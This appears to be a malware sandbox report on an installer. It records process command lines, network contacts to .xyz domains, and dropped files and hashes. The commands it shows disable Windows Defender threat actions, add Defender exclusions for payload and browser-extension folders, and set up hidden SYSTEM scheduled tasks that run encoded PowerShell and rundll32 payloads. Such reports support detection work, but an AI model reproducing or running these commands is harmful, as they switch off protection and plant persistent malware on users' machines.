"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gOnSLtuaM" /SC once /ST 01:04:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gOnSLtuaM"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gOnSLtuaM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MWViHNuTpmRlpInKg" /SC once /ST 02:36:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe\" Ci /JIsite_idTRr 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "MWViHNuTpmRlpInKg"

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe Ci /JIsite_idTRr 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bpJjqbWMDOjxkYrvBb"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qBvbbKpBU\CoPIfj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wbeMFPOaxEodGIM" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wbeMFPOaxEodGIM2" /F /xml "C:\Program Files (x86)\qBvbbKpBU\tdfVGAH.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ahmsGQGyepwQnm" /F /xml "C:\Program Files (x86)\fZHZowTYSgfU2\aJtOsWq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NOwjEMTwOUYCj2" /F /xml "C:\ProgramData\nxeoDZreGracWIVB\WFVdaTI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZeWhkVIxDswmIVkZF2" /F /xml "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\DXIODRJ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rhpwGKPBtZLjUbFdohf2" /F /xml "C:\Program Files (x86)\epUZFeichsCPC\jafxhIg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BinjFlxHFUMMGNOij" /SC once /ST 04:04:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\JHEwijpMlSQrgvQB\ZCDJPBcy\qOGTqyv.dll\",#1 /gEsite_idacO 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BinjFlxHFUMMGNOij"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\ZCDJPBcy\qOGTqyv.dll",#1 /gEsite_idacO 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\ZCDJPBcy\qOGTqyv.dll",#1 /gEsite_idacO 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "MWViHNuTpmRlpInKg"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BinjFlxHFUMMGNOij"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 150.1.37.23.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 96.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 138.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 46.206.58.216.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 65.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 api5.check-data.xyz udp
US 44.240.147.44:80 api5.check-data.xyz tcp
US 8.8.8.8:53 44.147.240.44.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe

MD5 179fb197a3d7311375c9037091fc224c
SHA1 802c18d747c379acd9c9a1fcae6e29636b7bd224
SHA256 ff3ef3388be54902b91b3833f2abea5b31fe50f4b5f1cc8be06d6aca1b6683b9
SHA512 c2d30d078c1358fcbfa5079893ab21c745df2532deee61b84e3eec395efeded6769a73c3d961fbb7f71260a6303e0f9cf22f37111fb90e7b8d4e4fdbd0337317

memory/4076-16-0x0000000000390000-0x0000000000A4A000-memory.dmp

memory/4076-17-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/3584-20-0x00000000737A0000-0x0000000073F50000-memory.dmp

memory/3584-21-0x0000000003020000-0x0000000003056000-memory.dmp

memory/3584-22-0x0000000002FD0000-0x0000000002FE0000-memory.dmp

memory/3584-23-0x0000000002FD0000-0x0000000002FE0000-memory.dmp

memory/3584-24-0x00000000056B0000-0x0000000005CD8000-memory.dmp

memory/3584-25-0x0000000005620000-0x0000000005642000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i20qhyxx.xbw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3584-32-0x0000000005FF0000-0x0000000006056000-memory.dmp

memory/3584-26-0x0000000005F10000-0x0000000005F76000-memory.dmp

memory/3584-37-0x0000000006260000-0x00000000065B4000-memory.dmp

memory/3584-38-0x00000000065F0000-0x000000000660E000-memory.dmp

memory/3584-39-0x0000000006BB0000-0x0000000006BFC000-memory.dmp

memory/3584-42-0x00000000737A0000-0x0000000073F50000-memory.dmp

memory/4076-46-0x0000000000390000-0x0000000000A4A000-memory.dmp

memory/3092-48-0x0000000000960000-0x000000000101A000-memory.dmp

memory/3092-49-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/2120-52-0x0000000073890000-0x0000000074040000-memory.dmp

memory/2120-53-0x0000000001420000-0x0000000001430000-memory.dmp

memory/2120-54-0x0000000004610000-0x0000000004964000-memory.dmp

memory/2120-64-0x0000000004DD0000-0x0000000004E1C000-memory.dmp

memory/2120-67-0x0000000073890000-0x0000000074040000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/920-69-0x0000000073890000-0x0000000074040000-memory.dmp

memory/920-70-0x0000000001860000-0x0000000001870000-memory.dmp

memory/920-71-0x0000000001860000-0x0000000001870000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0842dfd50ee9f64f1cc835bab876f3fe
SHA1 a934ff56eded078f1d460c8723013a633ebfda5e
SHA256 819738a2f59f43c1c3404cf3fdcf4c091963ea2617a9dd0183025d995eb2c223
SHA512 f709e75a2afe326db44b24059ebc83760c0b2a364926b2b0d9887ab71cb704ed5b97950532b2ca3dfc9fa795311ca10f8d68f924800132858dba0b0010a8e7c8

memory/920-83-0x0000000073890000-0x0000000074040000-memory.dmp

memory/2828-86-0x000001EDEFA50000-0x000001EDEFA72000-memory.dmp

memory/2828-96-0x00007FFD38E80000-0x00007FFD39941000-memory.dmp

memory/2828-98-0x000001EDEFB10000-0x000001EDEFB20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9dc1612473e2bebe334fd86c7b3d16eb
SHA1 093f0f1c10084b5102d1aacb25e826d9d3849c7d
SHA256 16d78844a17c047eb94edf86dc51b43526bb955583bac69efb3d22b3b045b3df
SHA512 0f00cb0446c0157cd7f4e9981c901c428aab820058acbe8e50545be4aaa3710b7468f95ad8adc5932fb3e6833bc2619b6f23771e74e792b2802d75d08ba90602

memory/2828-97-0x000001EDEFB10000-0x000001EDEFB20000-memory.dmp

memory/2828-102-0x00007FFD38E80000-0x00007FFD39941000-memory.dmp

memory/3092-103-0x0000000000960000-0x000000000101A000-memory.dmp

memory/3148-108-0x00000000009B0000-0x000000000106A000-memory.dmp

memory/3092-109-0x0000000000960000-0x000000000101A000-memory.dmp

memory/3148-110-0x0000000010000000-0x0000000014B4C000-memory.dmp

memory/3148-121-0x00000000022B0000-0x0000000002335000-memory.dmp

memory/2456-123-0x00000000734E0000-0x0000000073C90000-memory.dmp

memory/2456-124-0x0000000001CA0000-0x0000000001CB0000-memory.dmp

memory/2456-126-0x0000000001CA0000-0x0000000001CB0000-memory.dmp

memory/2456-141-0x0000000004EC0000-0x0000000005214000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b9b0314d5794fc25d8f6e9a3c0f0caf6
SHA1 becb1ad6a1e77a932ead97985400948f2107eef9
SHA256 b12b1cff7a5ab505cb429783d59de7722b3dcc650a2e96334c8a4715d01c964d
SHA512 86075e3e683f77e4fe7ddf531a94327afc186895d08ac629dcd3d66f6fbb1afd0d0e269a4dc666f98a2186330ae84faf9acf251591d47f6f1db076e610ee5e23

memory/2456-159-0x0000000005570000-0x00000000055BC000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 5afb20b6db2d3a25749ad858deb9e62d
SHA1 86b3cf6d4f1e6768cde236b470cd24517666dd43
SHA256 670812d39ed1a31165d85fd16d7e1554c37d80074d59252b4dd23cd7e0ff1bc7
SHA512 4f656edc59dec0719daacc259e74768c32c4d2f99145da33c149b4102b86b9d970cc7b4bbae7c3f94d49480c5e814a6eed0d4af158342ac3cbed03de329640a3

memory/2456-170-0x00000000734E0000-0x0000000073C90000-memory.dmp

memory/3148-180-0x0000000002CE0000-0x0000000002D49000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
